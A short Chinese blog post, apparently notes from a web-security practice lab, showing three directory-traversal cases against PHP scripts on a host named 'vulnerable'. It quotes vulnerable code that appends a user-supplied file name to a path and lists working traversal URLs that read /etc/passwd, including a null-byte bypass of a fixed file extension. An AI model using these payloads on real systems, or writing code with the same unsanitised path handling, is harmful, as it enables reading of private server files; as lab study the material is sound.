例1:
// 由用户指定程序来读取服务器上的哪个文件
<img width="20" src="dirtrav/example1.php?file=hacker.png">
$path = '/var/www/files/' . $_GET['file'];
对于这种类型,就这样:
http://vulnerable/dirtrav/example1.php?file=hacker.png 返回图片
http://vulnerable/dirtrav/example1.php?file=../../../../../../../../../../../etc/passwd 显示出来了!
例2:
// 这也太暴露了
<img width="20" src="dirtrav/example2.php?file=/var/www/files/hacker.png">
对于这种类型,就这样:
http://vulnerable/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd
例3:
似乎对于写死文件后缀的情况,可以这样:
http://vulnerable/dirtrav/example3.php?file=../../../../../../../../../../../etc/passwd % 00 # 没有空格
* 以上通过火狐add-on: chrome://restclient/content/restclient.html 测试
没有评论:
发表评论